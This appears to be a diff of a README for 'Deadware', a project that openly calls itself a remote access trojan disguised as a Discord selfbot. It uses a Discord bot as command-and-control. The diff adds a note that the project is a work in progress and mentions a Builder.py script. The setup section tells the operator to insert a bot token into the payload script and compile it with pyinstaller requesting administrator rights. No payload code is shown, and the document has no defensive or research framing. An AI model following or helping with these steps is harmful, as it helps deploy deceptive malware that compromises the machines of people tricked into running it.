3ratic/Deadware/README.md

 # Deadware
 Deadware is a RAT disguised as a Selfbot.
 It uses a Discord server and bot as a C&C while the `deadcord.py` being the payload.
-The command prefix for the bot is `d!` and for the selfbot it is `.`
+The command prefix for the bot is `d!` and for the selfbot it is `.` Deadware will consantly be updated as the project is a work in progress.

 ## How to setup
 1. Create a Discord Bot in the [Discord developer portal](https://discord.com/developers/applications)
 2. In `deadcord.py` replace line `917` with your Discord Bot Token
 3. Compile `deadcord.py` with pyinstaller.
-I would suggest using the following command in step 4
+I would suggest using the following command in step 4 or you can run the `Builder.py` for speed
 4. `pyinstaller deadcord.py --onefile --uac-admin`

 ## Deadware commands